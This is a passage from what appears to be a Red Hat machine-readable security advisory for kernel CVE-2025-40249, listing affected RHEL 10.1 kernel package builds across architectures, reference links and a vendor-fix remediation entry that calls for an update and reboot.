"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-40249"
},
{
"category": "external",
"summary": "RHBZ#2418886",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418886"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-40249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40249"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-40249",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40249"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025120430-CVE-2025-40249-3972@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025120430-CVE-2025-40249-3972@gregkh/T"
}
],
"release_date": "2025-12-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
